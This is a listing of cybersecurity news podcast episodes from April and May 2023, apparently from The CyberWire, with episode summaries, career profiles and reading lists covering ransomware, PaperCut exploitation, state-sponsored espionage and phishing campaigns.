    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    Babuk resurfaces for criminal inspiration. Alert on PaperCut vulnerability exploitation. Too many bad bots. Phishing-as-a-service in the C2C market. KillNet's PMHC regrets. May 12, 2023

    Babuk source code provides criminal inspiration. CISA and FBI release a joint report on PaperCut. There are more bad bots out there than anyone would like. Phishing-as-a-service tools in the C2C market. CISA’s Eric Goldstein advocates the adoption of strong controls, defensible networks and coordination of strategic cyber risks. Our cyberwire producer Liz Irvin speaks with Crystle-Day Villanueva, Learning and Development Specialist for Lumu Technologies. And KillNet’s short-lived venture, with a dash of regret.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/92


    Selected reading.

    Babuk code used by 9 ransomware gangs to encrypt VMWare ESXi servers (Bleeping Computer)

    Ransomware actors adopt leaked Babuk code to hit Linux systems (Decipher)

    Hypervisor Ransomware | Multiple Threat Actor Groups Hop on Leaked Babuk Code to Build ESXi Lockers (SentinelOne)

    Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG (CISA)

    CVE-2023-27350 Detail (NIST)

    Proofpoint Emerging Threats Rules (Proofpoint)

    2023 Imperva Bad Bot Report (Imperva)

    New phishing-as-a-service tool “Greatness” already seen in the wild (Cisco Talos)

    Ukraine at D+442: Russians say the Ukrainian counteroffensive has begun. (CyberWire)


    Ransomware and social engineering trends. Expired certificate addressed. Ransomware groups target schools. Cyber updates in the hybrid war. May 11, 2023

    A Ransomware report highlights targeting and classification. Phishing remains a major threat. Cisco addresses an expired certificate issue. LockBit and Medusa hit school districts with ransomware. US and Canadian cyber units wrap up a hunt-forward mission in Latvia. Ben Yelin on NYPD surveillance. Our CyberWire producer Liz Irvin interviews Damien Lewke, a graduate student at MIT. And an unknown threat actor is collecting against both Russia and Ukraine.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/91


    Selected reading.

    GRIT Ransomware Report: April 2023 (GuidePoint Security)

    DNSFilter State of Internet Security - Q1 2023 (DNSFilter)

    Identify vEdge Certificate Expired on May 9th 2023 (Cisco)

    The State of Ransomware Attacks in Education 2023: Trends and Solutions (Veriti)

    US Cyber Command 'Hunts Forward' in Latvia (Voice of America)

    US cyber team unearths malware during ‘hunt-forward’ mission in Latvia (C4ISRNET)

    Uncovering RedStinger - Undetected APT cyber operations in Eastern Europe since 2020 (Malwarebytes)

    Bad magic: new APT found in the area of Russo-Ukrainian conflict (Kaspersky)


    CISA Alert AA23-129A – Hunting Russian intelligence “Snake” malware. May 11, 2023

    The Snake implant is considered the most sophisticated cyber espionage tool designed and used by Center 16 of Russia’s Federal Security Service, or FSB, for long-term intelligence collection on sensitive targets.

    AA23-129A Alert, Technical Details, and Mitigations

    For more information on FSB and Russian state-sponsored cyber activity, please see the joint advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and CISA’s Russia Cyber Threat Overview and Advisories webpage.

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

    See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

    U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    Five Eyes disrupt FSB’s Snake malware. From DDoS to cryptojacking. Ransomware trends. Yesterday’s Patch Tuesday is in the books. May 10, 2023

    The Five Eyes disrupt Russia’s FSB Snake cyberespionage infrastructure. Shifting gears: from DDoS to cryptojacking. Trends in ransomware. Our guest is Steve Benton from Anomali with insights on potential industry headwinds. Ann Johnson from Afternoon Cyber Tea speaks with Roland Cloutier about risk and resilience in the modern era. And yesterday’s Patch Tuesday is now in the books, including a work-around for a patch from this past March.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/90


    Selected reading.

    Patch Tuesday notes. (The CyberWire)

    U.S. Agencies and Allies Partner to Identify Russian Snake Malware Infrastructure Worldwide (US National Security Agency)

    Hunting Russian Intelligence “Snake” Malware (Joint Cybersecurity Advisory)

    RapperBot DDoS Botnet Expands into Cryptojacking (Fortinet)

    The State of Ransomware 2023 (Sophos)

    From One Vulnerability to Another: Outlook Patch Analysis Reveals Important Flaw in Windows API (Akamai)

    Windows MSHTML Platform Security Feature Bypass Vulnerability (Microsoft)


    State-sponsored and state-promoted cyber campaigns. A look at Royal ransomware. A new wave of BEC. Man-in-the-middle attacks rising. May 09, 2023

    An analysis of Royal ransomware. PaperCut vulnerability detection methods can be bypassed. Man-in-the-middle phishing attacks are on the rise. A new wave of BEC attacks from an unexpected source. Thomas Etheridge from CrowdStrike has the latest threat landscape trends. Our guest is Dan Amiga of Island with insights on the enterprise browser category. And a look into recent Russian cyberattacks against Ukraine.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/89


    Selected reading.

    Threat Assessment: Royal Ransomware (Unit 42)

    PaperCut Exploitation - A Different Path to Code Execution (VulnCheck)

    New PaperCut RCE exploit created that bypasses existing detections (Bleeping Computer)

    Man-in-the-Middle (MitM) attacks reaching inboxes increase 35% since 2022 (Cofense)

    Exploring the Rise of Israel-Based BEC Attacks (Abnormal Security)

    Russians launch mass cyber attack on online service for queueing to cross border by trucks (Ukrainska Pravda)

    Reverting UAC-0006: Mass distribution of SmokeLoader using the "accounts" theme (CERT-UA#6613) (CERT-UA)


    Developments in the ransomware underworld: ALPHV, Akira, Cactus, and Royal. Some organizations remain vulnerable to problems with unpatched Go-Anywhere instances. May 08, 2023

    ALPHV claims responsibility for a cyberattack on Constellation Software. A new Akira ransomware campaign spreads. CACTUS is a new ransomware leveraging VPNs to infiltrate its targets. Many organizations are still vulnerable to the Go-Anywhere MFT vulnerability. Russian hacktivists interfere with the French Senate's website. Keith Mularski from EY details their "State of the Hack" report. Emily Austin from Censys discusses the State of the Internet. And ransomware gangs target local governments in Texas and California.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/88


    Selected reading.

    ALPHV gang claims ransomware attack on Constellation Software (BleepingComputer)

    Constellation Software hit by cyber attack, some personal information stolen (IT World Canada)

    Press Release of Constellation Software Inc. (GlobeNewswire News Room)

    Meet Akira — A new ransomware operation targeting the enterprise (BleepingComputer)

    New Cactus ransomware encrypts itself to evade antivirus (BleepingComputer)

    Pro-Russian Hackers Claim Downing of French Senate Website (SecurityWeek)

    Dallas cyberattack highlights ransomware’s risks to public safety, health (Washington Post)

    Hacked: Dallas Ransomware Attack Disrupts City Services (Dallas Observer)

    City of Dallas Continues Battling Ransomware Attack for Third Day (NBC 5 Dallas-Fort Worth)

    San Bernardino County pays hackers $1.1 million ransom after cyber attack (Victorville Daily Press)

    San Bernardino County pays $1.1M ransom after cyberattack disrupts Sheriff's Department systems (ABC7 Los Angeles)

    Atomic Data devastated by the unexpected death of CEO and co-owner Jim Wolford (Atomic Data)


    Shelley Ma: The mystery behind cybersecurity. [Response Lead] [Career Notes] May 07, 2023

    Shelley Ma, Incident Response Lead at Coalition, sits down to share her story, starting all the way back when she was a kid and fell in love with playing the game "NeoPets," which ended up paving the way for her future in cybersecurity. After starting this journey, she shares how she became intrigued with crime and mystery shows, which ultimately spawned an interest in forensic science. She ended up signing up for an internship program that she was able to get into, which she says was a pivotal change for her that provided her the chance to begin her career. She shares the advice that if anyone is looking to get into this career, she highly recommends looking into the career before beginning. Following some advice given to her by a professor and mentor, she says that telling the truth helps her deal with adversity in the workplace. Shelley says "In our industry, there are so many opportunities for our opinions and testimonies to be coerced and swayed. I refuse to do that and every time I come back to what my professor said, if you don't want to spend the rest of your life looking over your shoulders, just simply tell the truth." We thank Shelley for sharing her story with us.


    Phishing campaign takes the energy out of Chinese nuclear industry. [Research Saturday] May 06, 2023

    Ryan Robinson from Intezer joins Dave to discuss his team's work on "Phishing Campaign Targets Chinese Nuclear Energy Industry." The research team discovered activity targeting the nuclear energy industry in China. Researchers attributed the activity to Bitter APT, a South Asian APT that is known to target the energy, manufacturing and government sectors, mainly in Pakistan, China, Bangladesh, and Saudi Arabia.

    The article states "We identified seven emails pretending to be from the Embassy of Kyrgyzstan, being sent to recipients in the nuclear energy industry in China. In some emails, people and entities in academia are also targeted, also related to nuclear energy." By inviting recipients to conferences on subjects relevant to them, the attackers lure them in and are then able to social engineer the victims.

    The research can be found here:

    • Phishing Campaign Targets Chinese Nuclear Energy Industry

    DPRK's Kimsuky spearphishes. A standards strategy for AI. Ransomware Task Force retrospective. KillNet's new menu. Ex Uber CSO sentenced for data breach cover-up. May 05, 2023

    Kimsuky has a new reconnaissance tool. The Biden administration shares plans for AI. Reports on the Ransomware Task Force's progress report. KillNet recommits to turning a profit. Deepen Desai from Zscaler has the latest stats on phishing. Our guest is Karen Worstell from VMware with a conversation about inclusivity. And the former CSO at Uber is sentenced.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/87


    Selected reading.

    Kimsuky Evolves Reconnaissance Capabilities in New Global Campaign (SentinelOne)

    Ransomware Task Force Gaining Ground - May 2023 Progress Report (Ransomware Task Force)

    Influential task force takes stock of progress against ransomware (Washington Post)

    For Money and Attention: Killnet Apparently Reorganizes Again (Flashpoint)

    Killnet Ostracizes Leader of Anonymous Russia, Adding New Chapter to Pro-Kremlin Hacktivist Drama (Flashpoint)

    Former Uber CSO Joe Sullivan Avoids Prison Time Over Data Breach Cover-Up (Security Week)

    Former Uber security chief Sullivan avoids prison in data breach case (Washington Post)


    Cyberespionage, straight out of Beijing, Teheran, and Moscow. Developments in the criminal underworld. Indictment in a dark web carder case. May 04, 2023

    An APT41 subgroup uses new techniques to bypass security products. Iranian cyberespionage group MuddyWater is using Managed Service Provider tools. Wipers reappear in Ukrainian networks. Meta observes and disrupts the new NodeStealer malware campaign. The City of Dallas is moderately affected by a ransomware attack. My conversation with Karin Voodla, part of the US State Department’s Cyber fellowship program. Lesley Carhart from Dragos shares Real World Stories of Incident Response and Threat Intelligence. And there’s been an indictment and a takedown in a major dark web carder case.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/86


    Selected reading.

    Attack on Security Titans: Earth Longzhi Returns With New Tricks (Trend Micro)

    APT groups muddying the waters for MSPs (ESET)

    Russian hackers use WinRAR to wipe Ukraine state agency’s data (BleepingComputer)

    WinRAR as a "cyberweapon". Destructive cyberattack UAC-0165 (probably Sandworm) on the public sector of Ukraine using RoarBat (CERT-UA#6550) (CERT-UA)

    The malware threat landscape: NodeStealer, DuckTail, and more (Engineering at Meta)

    Facebook disrupts new NodeStealer information-stealing malware (BleepingComputer)

    NodeStealer Malware Targets Gmail, Outlook, Facebook Credentials (Decipher)

    City of Dallas likely targeted in ransomware attack, city official says (Dallas News)

    Cybercriminal Network Fueling the Global Stolen Credit Card Trade is Dismantled (US Department of Justice)

    Secret Service, State Department Offer Up To $10 Million Dollar Reward For Information On Wanted International Fugitive (US Secret Service)

    Police dismantles Try2Check credit card verifier used by dark web markets (BleepingComputer)


    Iran integrates influence and cyber operations. ChatGPT use and misuse. Trends in the cyber underworld. Hybrid warfare and cyber insurance war clauses. May 03, 2023

    Iran integrates influence and cyber operations. ChatGPT use and misuse. Phishing reports increased significantly so far in 2023, while HTML attacks double. An update on the Discord Papers. Cyberstrikes against civilian targets. My conversation with our own Simone Petrella on emerging cyber workforce strategies. Tim Starks from the Washington Post joins me with reflections on the RSA conference. And, turns out, a war clause cannot be invoked in denying damage claims in the NotPetya attacks (at least not in the Garden State).


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/85


    Selected reading.

    Rinse and repeat: Iran accelerates its cyber influence operations worldwide (Microsoft On the Issues)

    ChatGPT Confirms Data Breach, Raising Security Concerns (Security Intelligence)

    Samsung Bans Generative AI Use by Staff After ChatGPT Data Leak (Bloomberg)

    Malicious email campaigns abusing Telegram bots rise tremendously in Q1 2023, surpassing all of 2022 by 310% (Cofense)

    Threat Spotlight: Proportion of malicious HTML attachments doubles within a year (Barracuda)

    Zelensky says White House told him nothing about Discord intelligence leaks (Washington Post)

    Russia attacks civilian infrastructure in cyberspace just as it does on ground - watchdog (Ukrinform)

    Merck’s Insurers On the Hook in $1.4 Billion NotPetya Attack, Court Says (Wall Street Journal)

    Merck entitled to $1.4B in cyberattack case after court rejects insurers' 'warlike action' claim (Fierce Pharma)


    From cryptostealers to CCTV exploits, from Magecart enhancements to coronation phishbait, cybercriminals have been active. (But so have law enforcement agencies.) May 02, 2023

    LOBSHOT is a cryptowallet stealer abusing Google Ads. Coronation phishbait. A known CCTV vulnerability is currently being exploited. T-Mobile discloses another, smaller data breach. New Magecart exploits. Preliminary lessons from cyber operations during Russia's war. Rob Boyce from Accenture shares insights from RSA Conference. Our special guest is NSA Director of Cybersecurity Rob Joyce. And Europol announces a major dark web market takedown.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/84


    Selected reading.

    New LOBSHOT malware gives hackers hidden VNC access to Windows devices (BleepingComputer)

    New 'Lobshot' hVNC Malware Used by Russian Cybercriminals (SecurityWeek)

    Elastic Security Labs discovers the LOBSHOT malware (Elastic Blog)

    Researchers see surge in scam websites linked to coronation (Computer Weekly)

    TBK DVR Authentication Bypass Attack (FortiGuard)

    T-Mobile discloses second data breach since the start of 2023 (BleepingComputer)

    T-Mobile discloses 2nd data breach of 2023, this one leaking account PINs and more (Ars Technica)

    T-Mobile Announces Another Data Breach (CNET)

    Magecart threat actor rolls out convincing modal forms (Malwarebytes)

    Cyber lessons from Ukraine: Prepare for prolonged conflict, not a knockout blow (Breaking Defense)

    288 dark web vendors arrested in major marketplace seizure (Europol)


    FDA warns of biomed device vulnerability. Ransomware's effects continue at US Marshals Service fugitive tracking. US DoJ shifts to disruption of cybercrime. GRU phishing. KillNet’s ask-me-anything. May 01, 2023

    The FDA warns of a vulnerability affecting biomedical devices. Ransomware's effects continue to trouble the US Marshals Service. The US Justice Department shifts how it deals with large scale cybercrime. Fresh phish from the GRU. Caleb Barlow looks at unicorns and zombiecorns. Our guest Manoj Sharma from Symantec explains the differences between Zero Trust and SASE. And KillNet runs an ask-me-anything session.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/83


    Selected reading.

    Illumina cyber vulnerability may present risks for patient results (U.S. Food and Drug Administration)

    CISA, FDA warn of new Illumina DNA device vulnerability (Record)

    Key law enforcement computers still down 10 weeks after breach (Washington Post)

    Feds Prioritizing Disruptions Over Arrests in Cyberattack Cases (PCMAG)

    "Ashamed" LockBit ransomware gang apologises to hacked school, offers free decryption tool (Hot for Security)

    APT28 cyberattack: distribution of emails with "instructions" on "updating the operating system" (CERT-UA#6562) (CERT-UA)

    Hackers use fake ‘Windows Update’ guides to target Ukrainian govt (BleepingComputer)

    Ukraine at D+431: Drone strikes and phishing expeditions. (CyberWire)


    Perry Carpenter: Turning composition into computing. [Strategy] [Career Notes] Apr 30, 2023

    Perry Carpenter, Chief Evangelist and Strategy Officer at KnowBe4 and host of the 8th Layer Insights podcast, sits down to share his story of trying different paths before ultimately switching over to the cyber industry. After trying to go down the paths of music and law and finding neither was what he wanted to do, he decided to take an internship to get more into computer programming. That led him to his first job. After his first job, he moved on to other big name companies like Walmart, Alltel, and Gartner, finally landing with KnowBe4. He compares his work to working with music, which he initially wanted to pursue early in his career. He says "I think for me, when it was the kind of the connection between music and computing is that whenever you're kind of joining things together or at a, a musical scale to make chords, or whenever you're adding different, um, instruments and octaves together or timbers together to get some kind of bigger result." We thank Perry for sharing his story.


    HinataBot focuses on DDoS attack. [Research Saturday] Apr 29, 2023

    This week our guests are Larry Cashdollar, Chad Seaman and Allen West from Akamai Technologies, and they are discussing their research on "Uncovering HinataBot: A Deep Dive into a Go-Based Threat." The team discovered a new Go-based, DDoS-focused botnet. They found it was named after a character from the popular anime show "Naruto," so they are calling it "HinataBot."

    The research says "HinataBot was seen being distributed during the first three months of 2023 and is actively being updated by the authors/operators." Akamai was able to get a deep look into how the malware works by combining reverse engineering of the malware with imitation of its command and control (C2) server.

    The research can be found here:

    • Uncovering HinataBot: A Deep Dive into a Go-Based Threat

    What’s now being traded in the C2C markets. CISA would like comments on its software self-attestation form. And in Russia’s hybrid war, are there cyber war crimes, or real hacktivists? Apr 28, 2023

    Cl0p and LockBit exploit PaperCut vulnerability in ransomware campaigns. Infostealer traded in the C2C market. All ads are trying to get your money, but some just take it. CISA requests comment on software self-attestation form. Our guest is Marcin Kleczynski, CEO of Malwarebytes, sharing thoughts on the current threat landscape, attacks on students and academic institutions. Betsy Carmelite from Booz Allen, discussing themes from the RSAC tied into critical infrastructure resilience. Ukraine argues that cyberattacks against civilian infrastructure should be classified as war crimes. And are there any genuine disinterested hacktivists on Russia's side, or are they all fronts?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/82


    Selected reading.

    Microsoft Confirms PaperCut Servers Used to Deliver LockBit and Cl0p Ransomware (The Hacker News)

    Microsoft: Clop and LockBit ransomware behind PaperCut server hacks (BleepingComputer)

    New 'Atomic macOS Stealer' Malware Offered for $1,000 Per Month (SecurityWeek)

    “Malverposting” — With Over 500K Estimated Infections, Facebook Ads Fuel This Evolving Stealer… (Guardio)

    Request for Comment on Secure Software Self-Attestation Common Form (CISA)

    OMB, CISA set to release common form for software self-attestation (FCW)

    Pro-Russian hacktivism isn’t real, top Ukrainian cyber official says (CyberScoop)


    Waging lawfare against criminal infrastructure. Notes from the cyber underworld. Hybrid war, and cyber ops across the spectrum of conflict. And what do the bots want? (Hint: kicks.) Apr 27, 2023

    Google targets CryptBot malware infrastructure. FIN7 attacked Veeam servers to steal credentials. Ransomware-as-a-service offering threatens Linux systems. Evasive Panda targets NGOs in China. Anonymous Sudan is active against targets in Israel. Russian ransomware operations aim at disrupting supply chains into Ukraine. Our guest is Stuart McClure, CEO of Qwiet AI. Microsoft’s Ann Johnson stops by with her take on the RSA conference. And bots want new kicks.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/81


    Selected reading.

    Continuing our work to hold cybercriminal ecosystems accountable (Google)

    Google Disrupts Massive CryptBot Malware Operation (Decipher)

    Google disrupts malware that steals sensitive data from Chrome users (TechCrunch)

    FIN7 Hackers Caught Exploiting Recent Veeam Vulnerability (SecurityWeek)

    RTM Locker Ransomware as a Service (RaaS) Now on Linux (Uptycs)

    Evasive Panda APT group delivers malware via updates for popular Chinese software (WeLiveSecurity)

    NSA sees 'significant' Russian intel gathering on European, U.S. supply chain entities (CyberScoop)

    Ukraine at D+427: Russian cyberattacks and disinformation before Ukraine's spring offensive. (CyberWire)

    Releasing leak suspect a national security risk, feds say (AP NEWS)

    Pentagon leak suspect may still have access to classified info, court filings allege (the Guardian)

    Netacea Quarterly Index: Top 5 Scalper Bot Targets of Q1 2023 (Netacea)


    BellaCiao from Tehran; PingPull from Beijing: two cyberespionage tools. SLP exploitation. Ransomware as an international threat. The state of hacktivism. Digital evidence or war crimes. Apr 26, 2023

    BellaCiao is malware from Iran's IRGC, while PingPull is malware used by the Chinese government-affiliated Alloy Taurus group. Ransomware continues to be a pervasive international threat. An overview of hacktivism. Our guest is CyberMindz founder Peter Coroneos, discussing the importance of mental health in cybersecurity. Johannes Ullrich shares insights from his RSAC panel discussions. And Ukraine continues to collect evidence of Russian war crimes.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/80


    Selected reading.

    Unpacking BellaCiao: A Closer Look at Iran’s Latest Malware (Bitdefender Blog)

    Chinese Alloy Taurus Updates PingPull Malware (Unit 42)

    Abuse of the Service Location Protocol May Lead to DoS Attacks (Cybersecurity and Infrastructure Security Agency CISA)

    #RSAC: Ransomware Poses Growing Threat to Five Eyes Nations (Infosecurity Magazine)

    Hacktivism Unveiled, April 2023 Insights into the footprints of hacktivists (Radware)

    FBI aiding Ukraine in collection of digital and physical war crime evidence (CyberScoop)


    BlackCat follows Cl0p to GoAnywhere. Mirai gets an upgrade. Deterring cyber war. Homeland Security’s cyber priorities. Action against DPRK cryptocrooks. What KillNet’s up to. Apr 25, 2023

    BlackCat (ALPHV) follows Cl0p in exploiting the GoAnywhere MFT vulnerability. The Mirai botnet exploits a vulnerability disclosed at Pwn2Own. An RSAC presentation describes the US response to Russian prewar and wartime cyber operations. The US Department of Homeland Security outlines cyber priorities. Andrea Little Limbago from Interos shares insights from her RSAC 2023 panels. The US indicts and sanctions DPRK operators in a crypto-laundering campaign. Our guest is Marc van Zadelhoff, CEO of Devo, with insights from the conference. And the latest on KillNet.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/79


    Selected reading.

    BlackCat Ransomware Group Exploits GoAnywhere Vulnerability (At-Bay)

    Zero Day Initiative — TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal (Zero Day Initiative)

    Years after discovery of SolarWinds breach, Russian hackers could be struggling (Washington Post)

    U.S. deploys more cyber forces abroad to help fight hackers (Reuters)

    DHS Outlines Cyber Priorities in Release of Delayed Review (Nextgov.com)

    US sanctions supporters of North Korean hackers, Iranian cyberspace head (Record)

    North Korean Foreign Trade Bank Rep Charged for Role in Two Crypto Laundering Conspiracies (Department of Justice. U.S. Attorney's Office District of Columbia)

    Treasury Targets Actors Facilitating Illicit DPRK Financial Activity in Support of Weapons Programs (U.S. Department of the Treasury)


    Supply-chain attack's effects spread. CISA makes new KEV entries. Bumblebee malware loader described. Decoy Dog toolset discovered. Discord Papers were shared earlier and more widely. Apr 24, 2023

    3CX is not the only victim in the recent supply chain attack. The PaperCut critical vulnerability is under active exploitation. The Bumblebee malware loader is buzzing around in the wild. A new unique malware toolkit called Decoy Dog. Rick Howard, CSO from N2K Networks, shares RSA Conference predictions and talks about his new book, "Cybersecurity First Principles." Our guest Theresa Lanowitz from AT&T Cybersecurity shares insights on Securing the Edge. And the alleged Discord Papers leaker shared earlier and more widely than previously known.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/78


    Selected reading.

    3CX Hackers Also Compromised Critical Infrastructure Firms (Infosecurity Magazine)

    That 3CX supply chain attack keeps getting worse (Register)

    Energy sector orgs in US, Europe hit by same supply chain attack as 3CX (Record)

    Even more victims found in complex 3CX supply chain attack (CybersecurityConnect)

    X_Trader Supply Chain Attack Affects Critical Infrastructure Organizations in U.S. and Europe (Symantec Enterprise Blogs)

    URGENT | PaperCut MF/NG vulnerability bulletin (March 2023) (PaperCut)

    PaperCut CVE-2023-27350 Deep Dive and Indicators of Compromise (Horizon3.ai)

    Russian Hackers Suspected in Ongoing Exploitation of Unpatched PaperCut Servers (The Hacker News)

    CISA KEV Breakdown | April 21, 2023 (Nucleus Security)

    CISA Adds Three Known Exploited Vulnerabilities to Catalog (Cybersecurity and Infrastructure Security Agency CISA)

    CISA Adds 3 Actively Exploited Flaws to KEV Catalog, including Critical PaperCut Bug (The Hacker News)

    CISA adds printer bug, Chrome zero-day and ChatGPT issue to exploited vulnerabilities catalog (Record)

    Bumblebee Malware Distributed Via Trojanized Installer Downloads (Secureworks)

    Google ads push BumbleBee malware used by ransomware gangs (BleepingComputer)

    Bumblebee malware infects victims via fake Zoom, Cisco and ChatGPT software installers (Record)

    Decoy Dog malware toolkit found after analyzing 70 billion DNS queries (BleepingComputer)

    Analyzing DNS Traffic for Anomalous Domains and Threat Detection (Infoblox Blog)

    Airman Shared Sensitive Intelligence More Widely and for Longer Than Previously Known (New York Times)

    FBI leak investigators home in on members of private Discord server (Washington Post)

    From Discord to 4chan: The Improbable Journey of a US Intelligence Leak (bellingcat)

    Europe’s Planes Keep Flying Despite Cyberattack (Wall Street Journal)


    Master Gunnery Sergeant Scott Stalker from US Space Command: goals and risks in the digital space operating environment. Apr 23, 2023

    T-Minus Deep Space Guest

    Scott Stalker, Command Senior Enlisted Leader at US Space Command, shares how the combatant command is adapting to new challenges in the digital era of space operations, new operational concepts, and building the force to deter aggression.

    You can follow US Space Command on LinkedIn and Twitter, and you can follow MGySgt Scott Stalker on LinkedIn.

    Remember to leave us a 5-star rating and review in your favorite podcast app.

    Miss an episode? Sign up for our weekly intelligence briefing, Signals and Space, and you’ll never miss a beat.

    Audience Survey

    We want to hear from you! Please complete our wicked fast 4 question survey. It’ll help us get better and deliver you the most mission-critical space intel every day.

    Want to hear your company in the show?

    You too can reach the most influential leaders in the industry. Here’s a link to our media kit. Contact us at space@n2k.com to request more info about sponsoring T-Minus.

    Want to join us for an interview?

    Please send your interview pitch to space-editor@n2k.com and include your name, affiliation, and topic proposal, and our editor will get back to you for scheduling.

    T-Minus is a production of N2K Networks, your source for strategic workforce intelligence. © 2023 N2K Networks, Inc.


    Maria Varmazis: Combining cyber and space. [Space] [Career Notes] Apr 23, 2023

    Maria Varmazis, N2K's Space Correspondent and host of N2K's newest podcast T-Minus, sits down to share her journey of combining her two passions, space and cyber. Maria grew up wanting to be an astronomer; in school she focused on joining anything involving technology and enjoyed the classes that made her think. After transferring to a new college, she went into journalism, absolutely falling in love with the new career path she had made for herself. She got a job at Sophos, and that's where she learned about cybersecurity. Now she discusses cyber and space in her new podcast, combining her two passions into one for all to understand. Maria discusses some of the setbacks she overcame in this industry and shares the wise advice of "I would never pretend that failure isn't painful, but it is an incredible teaching tool. So if you feel like you've had a huge career fail or a really big misstep, you can still pivot from that and you can make that into something." We thank Maria for sharing her story with us.


    Don't let the Elon Musk crypto giveaway scam swindle you. [Research Saturday] Apr 22, 2023

    Shiran Guez from Akamai sits down with Dave to discuss their research on "Chatbots, Celebrities, and Victim Retargeting and Why Crypto Giveaway Scams Are Still So Successful." Researchers at Akamai have been on the lookout for crypto giveaway scams. These scams have been impersonating celebrities and brands, most notably Elon Musk and his associated companies.

    The research states "the scams are delivered through various social media platforms as well as direct messaging apps such as WhatsApp or Telegram." These scams have helped add to the existing damages that exceed $1 billion caused by crypto fraud.

    The research can be found here:

    • Chatbots, Celebrities, and Victim Retargeting: Why Crypto Giveaway Scams Are Still So Successful

    Daggerfly swarms African telco. EvilExtractor described. Patriotic hacktivism in East Asia. Updates on Russia's hybrid war suggest that cyber warfare has some distinctive challenges. Apr 21, 2023

    Daggerfly APT targets an African telecommunications provider. EvilExtractor is an alleged teaching tool apparently gone bad. A Chinese-speaking threat group is active against Taiwan and South Korea. Europe’s air traffic control is under attack. Cecilia Marinier from RSAC and Barmak Meftah, a judge of ISB, discuss the RSA innovation sandbox. Awais Rashid from University of Bristol on the cybersecurity of smart farming. Forget about those evil maids. What about these evil sysadmins?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/77


    Selected reading.

    Daggerfly: APT Actor Targets Telecoms Company in Africa (Symantec)

    EvilExtractor – All-in-One Stealer (Fortinet Blog)

    Chinese-language threat group targeted a dozen South Korean institutions (Record)

    Xiaoqiying/Genesis Day Threat Actor Group Targets South Korea, Taiwan (Recorded Future)

    WSJ News Exclusive | Europe’s Air-Traffic Agency Under Attack From Pro-Russian Hackers (Wall Street Journal)

    Intelligence Leaks Cast Spotlight on a Recurring Insider Threat: Tech Support (Wall Street Journal)

    Russia’s invasion of Ukraine is also being fought in cyberspace (Atlantic Council)

    CFP European Cybersecurity Seminar 2023-2024 (European Cyber Conflict Research Initiative)

    #CYBERUK23: Russian Cyber Offensive Exhibits ‘Unprecedented’ Speed and Agility (Infosecurity Magazine)


    Two-step supply-chain attack. Plugging leaks, in both Mother Russia and the Land of the Free and the Home of the Brave. Belarus remains a player in the cyber war. Apr 20, 2023

    The 3CX compromise involved a two-stage supply-chain attack. Impersonating ChatGPT. Russia's security organs say they're cracking down on leaks. Updates on the Discord Papers case. Belarus arrests a pro-Russian hacktivist. Rob Boyce from Accenture Security on Dark Web cyber criminals targeting CRM systems. Our guest is Mike Loewy from the Tide Foundation, with an innovative approach to distributed key security. And, is Minsk going wobbly on Moscow?


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/76


    Selected reading.

    3CX Software Supply Chain Compromise Initiated by a Prior Software Supply Chain Compromise; Suspected North Korean Actor Responsible (Mandiant)

    ChatGPT-Themed Scam Attacks Are on the Rise (Palo Alto Networks Unit 42)

    Russian Offensive Campaign Assessment, April 19, 2023 (Institute for the Study of War)

    Belarus-linked hacking group targets Poland with new disinformation campaign (Record)

    Killnet Ostracizes Leader of Anonymous Russia, Adding New Chapter to Pro-Kremlin Hacktivist Drama (Flashpoint)


    CISA Alert AA23-108A – APT28 exploits known vulnerability to carry out reconnaissance and deploy malware on Cisco routers. Apr 20, 2023

